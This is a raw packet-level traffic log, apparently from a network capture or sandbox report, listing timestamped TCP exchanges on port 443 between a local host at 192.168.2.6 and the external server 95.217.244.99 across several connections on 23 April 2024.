Apr 23, 2024 21:44:18.402230978 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.402249098 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.402312994 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.402318954 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.402367115 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.404762983 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.404778957 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.404840946 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.404845953 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.404895067 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.407527924 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.407543898 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.407613993 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.407618999 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.407653093 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.411164045 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.411178112 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.411339045 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.411362886 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.411411047 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.413805962 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.413822889 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.413904905 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.413911104 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.413955927 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.416501045 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.416542053 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.416584969 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.416589975 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.416641951 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.419984102 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.420027018 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.420067072 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.420072079 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.420111895 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.422570944 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.422611952 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.422660112 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.422665119 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.422707081 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.425246954 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.425290108 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.425326109 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.425331116 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.425380945 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.428042889 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.428083897 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.428118944 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.428127050 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.428157091 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.428183079 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.432066917 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.432121992 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.432146072 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.432159901 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.432210922 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.434571028 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.434616089 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.434670925 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.434675932 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.434725046 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.434750080 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.437064886 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.437105894 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.437140942 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.437145948 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.437191010 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.439953089 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.439992905 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.440026999 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.440032005 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.440073967 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.442540884 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.442581892 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.442611933 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.442616940 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.442660093 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.444818020 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.444863081 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.444895983 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.444904089 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.444930077 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.444953918 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.447247982 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.447288990 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.447324991 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.447330952 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.447376966 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.450495958 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.450536966 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.450579882 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.450587034 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.450629950 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.452862978 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.452903986 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.452935934 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.452941895 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.452982903 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.455367088 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.455451012 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.456079960 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.456166029 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.458515882 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.458573103 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.458616018 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.458626032 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.458662987 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.458690882 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.461286068 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.461354971 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.461380005 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.461452007 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.463620901 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.463665962 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.463699102 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.463706970 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.463741064 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.463768959 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.465471029 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.465522051 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.465555906 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.465564966 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.465609074 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.468419075 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.468506098 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.468508005 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.468543053 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.468569994 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.468595982 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.468601942 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.468637943 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.468704939 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.468750954 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.475781918 CEST	49723	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.475804090 CEST	443	49723	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.598716974 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.598756075 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:18.598858118 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.599257946 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:18.599271059 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:19.034198046 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:19.034285069 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:19.034836054 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:19.034847975 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:19.035085917 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:19.035092115 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:19.721352100 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:19.721375942 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:19.721385002 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:19.721595049 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:19.721618891 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:19.721679926 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:19.819360018 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:19.819426060 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:19.819531918 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:19.819564104 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:19.819598913 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:19.819624901 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:19.959430933 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:19.959486008 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:19.959589005 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:19.959614038 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:19.959662914 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.061108112 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.061177969 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.061278105 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.061295033 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.061347008 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.133877039 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.133944035 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.134169102 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.134181023 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.134232998 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.181999922 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.182050943 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.182091951 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.182121992 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.182152987 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.182176113 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.224698067 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.224747896 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.224798918 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.224812984 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.224858046 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.263858080 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.263904095 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.264002085 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.264031887 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.264061928 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.264115095 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.306534052 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.306642056 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.306778908 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.306818962 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.306850910 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.306888103 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.349303007 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.349404097 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.349510908 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.349577904 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.349616051 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.349637032 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.383827925 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.383857012 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.383985043 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.384007931 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.384054899 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.408164978 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.408193111 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.408412933 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.408431053 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.408485889 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.432353973 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.432384014 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.432497978 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.432522058 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.432574034 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.453257084 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.453305960 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.453377962 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.453401089 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.453433990 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.453453064 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.473161936 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.473220110 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.473309994 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.473330021 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.473361015 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.473391056 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.487966061 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.488040924 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.488075972 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.488230944 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.488734961 CEST	49724	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.488754034 CEST	443	49724	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.519927979 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.519980907 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.520075083 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.520416975 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.520433903 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.954344034 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.954483032 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.955008984 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.955018997 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:20.955249071 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:20.955254078 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:21.641058922 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:21.641125917 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:21.641144991 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:21.641170979 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:21.641204119 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:21.641212940 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:21.641258001 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:21.738991976 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:21.739053011 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:21.739101887 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:21.739128113 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:21.739144087 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:21.739166975 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:21.878748894 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:21.878782988 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:21.878844023 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:21.878865957 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:21.878887892 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:21.878912926 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:21.980411053 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:21.980447054 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:21.980490923 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:21.980514050 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:21.980531931 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:21.980554104 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:22.042182922 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:22.042278051 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:22.042319059 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:22.042454958 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:22.042454958 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:22.043334007 CEST	49725	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:22.043354034 CEST	443	49725	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:22.417218924 CEST	49726	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:22.417309999 CEST	443	49726	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:22.417417049 CEST	49726	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:22.417720079 CEST	49726	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:22.417752981 CEST	443	49726	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:22.850475073 CEST	443	49726	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:22.850591898 CEST	49726	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:22.851360083 CEST	49726	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:22.851372004 CEST	443	49726	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:22.851629972 CEST	49726	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:22.851635933 CEST	443	49726	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:23.677542925 CEST	443	49726	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:23.677575111 CEST	443	49726	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:23.677627087 CEST	49726	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:23.677660942 CEST	443	49726	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:23.677680016 CEST	49726	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:23.677715063 CEST	49726	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:23.678034067 CEST	49726	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:23.678076982 CEST	443	49726	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:23.681304932 CEST	49727	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:23.681349039 CEST	443	49727	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:23.681423903 CEST	49727	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:23.681678057 CEST	49727	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:23.681689024 CEST	443	49727	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:24.149348021 CEST	443	49727	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:24.149506092 CEST	49727	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:24.150197983 CEST	49727	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:24.150208950 CEST	443	49727	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:24.150438070 CEST	49727	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:24.150443077 CEST	443	49727	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:25.018163919 CEST	443	49727	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:25.018260956 CEST	443	49727	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:25.018280029 CEST	49727	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:25.018309116 CEST	49727	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:25.018502951 CEST	49727	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:25.018518925 CEST	443	49727	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:25.035526991 CEST	49728	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:25.035571098 CEST	443	49728	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:25.035657883 CEST	49728	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:25.035933018 CEST	49728	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:25.035944939 CEST	443	49728	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:25.504137993 CEST	443	49728	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:25.504302025 CEST	49728	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:25.504899979 CEST	49728	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:25.504928112 CEST	443	49728	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:25.505137920 CEST	49728	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:25.505142927 CEST	443	49728	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:26.364973068 CEST	443	49728	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:26.365067959 CEST	443	49728	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:26.365123987 CEST	49728	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:26.365281105 CEST	49728	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:26.398821115 CEST	49728	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:26.398845911 CEST	443	49728	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:27.142393112 CEST	49729	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:27.142441034 CEST	443	49729	95.217.244.99	192.168.2.6
